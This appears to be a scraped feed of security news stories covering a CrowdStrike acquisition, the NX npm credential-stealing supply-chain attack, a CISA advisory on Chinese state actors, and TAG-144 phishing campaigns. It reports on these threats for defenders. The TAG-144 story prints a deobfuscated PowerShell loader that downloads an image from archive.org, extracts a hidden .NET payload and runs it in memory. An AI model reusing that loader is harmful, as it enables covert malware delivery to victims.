CrowdStrike Set to Acquire Onum in $290 Million Deal to Enhance Falcon Next-Gen SIEM

·

Acquisition, Cyber Security News
Global cybersecurity leader CrowdStrike announced its intention to acquire Onum, a pioneer in real-time telemetry pipeline management, in a deal reportedly valued at $290 million.

The acquisition, unveiled Wednesday, aims to significantly enhance CrowdStrike’s Falcon Next-Gen SIEM platform, transforming it into a more powerful data foundation for modern, AI-driven security operations.

The integration of Onum’s technology is set to address a critical challenge in security operations: managing and processing vast amounts of data efficiently. Onum’s platform acts as both a high-speed data pipeline and an intelligent filter, streaming refined, high-quality data directly into the Falcon platform.

“Our Next-Gen SIEM is the engine that powers the modern SOC, and data is the fuel that makes the engine run,” said George Kurtz, CEO and founder of CrowdStrike.

“Onum is both a pipeline and a filter, which will stream high-quality, filtered data directly into the platform to drive autonomous cybersecurity at scale. This is how we stop breaches at the speed of AI while giving customers complete control over their entire data ecosystem.”

Built on a proprietary in-memory architecture, Onum’s technology offers significant performance advantages. The company claims it can deliver up to five times more events per second than its nearest competitor.

By enabling “in-pipeline analysis,” Onum allows for AI-powered detections to occur at the data source, even before the data enters the Falcon platform.

This innovative approach promises up to 70 percent faster incident response times with 40 percent less ingestion overhead. Furthermore, its smart filtering capabilities can reduce data storage costs by as much as 50 percent.

Historically, migrating data into a new SIEM has been a major bottleneck for security teams, often requiring complex third-party tools and significant effort.

This acquisition is designed to eliminate that friction by making data streaming and in-pipeline detection a native function within the Falcon platform, accelerating SOC transformation for customers.

“Onum was founded on the belief that pipelines should do more than transport data, they should transform data into real-time intelligence,” said Pedro Castillo, founder and CEO of Onum. “By joining CrowdStrike, we can deliver this vision at unprecedented scale to accelerate SOC transformation on a global scale.”

The acquisition positions CrowdStrike to further solidify its Falcon platform as the central operating system for cybersecurity, expanding its capabilities beyond core security into broader IT observability. The transaction is subject to customary closing conditions.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post CrowdStrike Set to Acquire Onum in $290 Million Deal to Enhance Falcon Next-Gen SIEM appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
New Research Explores Emulating Scattered Spider Tactics in Real-World Scenarios

·

APT, cyber security, Cyber Security News, Threats

Experts have described methods for mimicking the strategies of the advanced persistent threat (APT) group Scattered Spider in a recent in-depth analysis by cybersecurity company Lares, allowing enterprises to strengthen their defenses through adversarial cooperation. Lares specializes in threat emulation, replicating real-world tactics, techniques, and procedures (TTPs) observed in cybercriminal activities. By dissecting incidents like […]

The post New Research Explores Emulating Scattered Spider Tactics in Real-World Scenarios appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
First AI-Powered Ransomware “PromptLock” Uses OpenAI gpt-oss-20b for Encryption

·

AI, cyber security, Cyber Security News, Ransomware

PromptLock, a novel ransomware strain discovered by the ESET Research team, marks the first known instance of malware harnessing a local large language model to generate its malicious payload on the victim’s machine. Rather than carrying pre-compiled attack logic, PromptLock ships with hard-coded prompts that instruct a locally hosted OpenAI gpt-oss:20b model—accessed via the Ollama […]

The post First AI-Powered Ransomware “PromptLock” Uses OpenAI gpt-oss-20b for Encryption appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Malicious Nx Packages in ‘s1ngularity’ Attack Leaked 2,349 GitHub, Cloud, and AI Credentials

·

The maintainers of the nx build system have alerted users to a supply chain attack that allowed attackers to publish malicious versions of the popular npm package and other auxiliary plugins with data-gathering capabilities. “Malicious versions of the nx package, as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials,

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
NX Build Tool Hacked with Malware That Checks for Claude or Gemini to Find Wallets and Secrets

·

cyber security, Cyber Security News, Vulnerabilities, vulnerability, Vulnerability News
Over 1,400 developers discovered today that a malicious post-install script in the popular NX build kit silently created a repository named s1ngularity-repository in their GitHub accounts.

This repository contains a base64-encoded dump of sensitive data wallet files, API keys, .npmrc credentials, environment variables, and more harvested directly from developers’ file systems.
```
Key Takeaways
1. Malware in the NX build tool steals credentials and creates GitHub repos.
2. Targets Claude and Gemini CLIs for advanced data exfiltration.
3. Delete suspicious repos, update NX, and rotate secrets urgently.
```
AI-Assisted Data Exfiltration

Semgrep reports that attackers leveraged the NX post-install hook via a file named telemetry.js to execute malicious code immediately after package installation.

The malware first collects environment variables and attempts to locate a GitHub authentication token via the GitHub CLI. Armed with credentials, it then creates a public repository such as s1ngularity-repository-0 and commits the stolen data in results.b64.

What makes this campaign particularly novel is its integration with Claude Code CLI or Gemini CLI. If either AI-powered CLI is present, the malware issues a carefully crafted prompt to conduct fingerprintable filesystem scans:

This AI-driven approach offloads the bulk of signature-based filesystem enumeration to the LLM, complicating traditional malware detection.

Affected NX Versions and Mitigations
- @nx/devkit 21.5.0, 20.9.0
- @nx/enterprise-cloud 3.2.0
- @nx/eslint 21.5.0
- @nx/key 3.2.0
- @nx/node 21.5.0, 20.9.0
- @nx/workspace 21.5.0, 20.9.0
- @nx 20.9.0–20.12.0, 21.5.0–21.8.0
Developers using any impacted versions should immediately run:

or inspect lockfiles for vulnerable dependencies.
- Search for unauthorized repositories.
- Delete any s1ngularity-repository* you find.
- Update NX to safe version 21.4.1 (vulnerable versions removed from npm).
- Rotate all exposed secrets: GitHub tokens, npm credentials, SSH keys, environment variables.
- Remove malicious shutdown directives in shell startup files (e.g., .bashrc).
As the incident unfolds, organizations are urged to monitor repository creations and enforce strict post-installation auditing.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

The post NX Build Tool Hacked with Malware That Checks for Claude or Gemini to Find Wallets and Secrets appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
BadSuccessor After Patch: Using dMSAs for Credential Theft and Lateral Movement in AD

·

cyber security, Cyber Security News, vulnerability

Akamai researchers evaluated Microsoft’s patch for the BadSuccessor vulnerability (CVE-2025-53779) to determine its scope and limitations. While the update effectively blocks the original direct escalation path, the core mechanics of BadSuccessor remain exploitable under specific conditions. In this article, we examine how attackers can continue to leverage delegated Managed Service Accounts (dMSAs) for credential theft […]

The post BadSuccessor After Patch: Using dMSAs for Credential Theft and Lateral Movement in AD appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

CISA Publish Hunting and Mitigation Guide to Defend Networks from Chinese State-Sponsored Actors

cyber security, Cyber Security News, Vulnerability News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), alongside the NSA, FBI, and a broad coalition of international partners, has released a comprehensive cybersecurity advisory detailing a widespread espionage campaign by People’s Republic of China (PRC) state-sponsored actors targeting critical networks worldwide.

The 37-page report, “Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System,” outlines the tactics, techniques, and procedures (TTPs) used by these advanced persistent threat (APT) groups to infiltrate and maintain long-term access to telecommunications, government, transportation, and military infrastructure.

Key Takeaways
1. Guide uses MITRE ATT&CK/D3FEND to counter Chinese APTs exploiting CVEs.
2. Enforce management isolation, disable risky features, and require strong authentication.
3. Prioritize patching, enable detailed logging, and coordinate threat hunting.

According to the advisory, these cyber actors tracked by industry groups under names like “Salt Typhoon” and “GhostEmperor” have been operating since at least 2021.

The operation aims to steal data that allows Chinese intelligence services to track the communications and movements of their targets around the globe.

The advisory explicitly links the activity to several Chinese technology companies, including Sichuan Juxinhe Network Technology Co. Ltd., which allegedly provides services to China’s military and intelligence arms.

A key finding of the investigation is that the actors are not relying on zero-day exploits. Instead, they are having “considerable success” by exploiting publicly known and often unpatched common vulnerabilities and exposures (CVEs).

The report urges network defenders to prioritize patching several specific vulnerabilities, including those affecting Cisco, Palo Alto Networks, and Ivanti devices.

CVE	Vendor/Product	Details
CVE-2024-21887	Ivanti Connect Secure and Ivanti Policy	Command injection vulnerability, often chained with CVE-2023-46805 for authentication bypass.
CVE-2024-3400	Palo Alto Networks PAN-OS GlobalProtect	Allows for unauthenticated remote code execution (RCE) via arbitrary file creation that leads to OS command injection on firewalls with specific GlobalProtect configurations.
CVE-2023-20273	Cisco IOS XE	A post-authentication command injection and privilege escalation flaw in the web management UI, frequently chained with CVE-2023-20198 to achieve root-level code execution.
CVE-2023-20198	Cisco IOS XE	An authentication bypass vulnerability in the web UI that enables the creation of unauthorized administrative accounts.
CVE-2018-0171	Cisco IOS and IOS XE	A remote code execution vulnerability related to the Smart Install feature .

The threat actors’ methodology involves a “living off the land” approach. After gaining initial access by exploiting a vulnerable, internet-facing router or firewall, they use the device’s own native tools and capabilities to burrow deeper into the network.

Techniques include modifying access control lists, capturing network traffic to steal credentials, and using on-box Linux containers like Cisco’s Guest Shell to hide their tools and activities from standard monitoring.

“These actors often modify routers to maintain persistent, long-term access to networks,” the advisory states. They create covert tunnels, re-route traffic to their own infrastructure, and meticulously clear logs to cover their tracks, making detection extremely difficult.

The joint advisory represents a massive international effort, with contributing agencies from Australia, Canada, the United Kingdom, New Zealand, Germany, Japan, Italy, and Poland, among others. It provides detailed threat-hunting guidance, urging organizations to:

Monitor for unauthorized configuration changes, unexpected network tunnels (GRE, IPsec), and suspicious use of packet capture tools.
Audit virtualized containers on network devices for unauthorized activity.
Verify firmware and software integrity against vendor-provided hashes.
Implement robust logging and forward logs to a secure, centralized server.

Mitigation strategies focus on hardening network infrastructure. Recommendations include disabling unused ports and services, implementing strict management-plane isolation, enforcing strong, unique credentials, and disabling legacy protocols like Telnet and SNMPv1/v2 in favor of secure, modern alternatives.

The advisory serves as a critical resource for network defenders, providing not only strategic guidance but also specific indicators of compromise, such as IP addresses used by the actors and YARA rules to detect their custom malware.

CISA and its partners strongly urge organizations, especially in the telecommunications sector, to use the guide to proactively hunt for malicious activity and fortify their defenses against this persistent global threat.

Tired of Filling Forms for security & Compliance questionnaires? Automate them in minutes with 1up! Start Your Free Trial Now!

The post CISA Publish Hunting and Mitigation Guide to Defend Networks from Chinese State-Sponsored Actors appeared first on Cyber Security News.

¶¶¶¶¶

Microsoft Unveils Storm-0501’s Cloud-Based Ransomware Deployment Tactics

·

cyber security, Cyber Security News, Microsoft, Ransomware

Microsoft Threat Intelligence has detailed the evolving tactics of the financially motivated threat actor Storm-0501, which has transitioned from traditional on-premises ransomware deployments to sophisticated cloud-based operations. Unlike conventional ransomware that relies on endpoint encryption malware and subsequent decryption key negotiations, Storm-0501 exploits cloud-native capabilities to exfiltrate massive data volumes, obliterate backups, and enforce ransom […]

The post Microsoft Unveils Storm-0501’s Cloud-Based Ransomware Deployment Tactics appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
U.S. Treasury Sanctions DPRK IT-Worker Scheme, Exposing $600K Crypto Transfers and $1M+ Profits

·

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced a fresh round of sanctions against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs. “The North Korean regime continues to target American

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures

·

cyber security, Cyber Security News, Threats
Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.

First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.

In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.

Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.

These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.

Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.

Phishing pages linked to Cluster 4 (Source – Recordedfuture)

The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.

Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.

Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.

Infection Mechanism and Steganographic Payload Extraction

One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.

Payload hosted on archive[.]org URL (Source – Recordedfuture)

Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.

For example, the deobfuscated PowerShell segment responsible for this process appears as:
```
$tormodont = 'https://archive.org/download/universe-.../universe.jpg'
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent','Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data
foreach ($y in 0..($bitmap.Height-1)) {
  foreach ($x in 0..($bitmap.Width-1)) {
    $color = $bitmap.GetPixel($x,$y)
    $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
  }
}
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)
```
This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.

By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

AI-Assisted Data Exfiltration

Affected NX Versions and Mitigations

Infection Mechanism and Steganographic Payload Extraction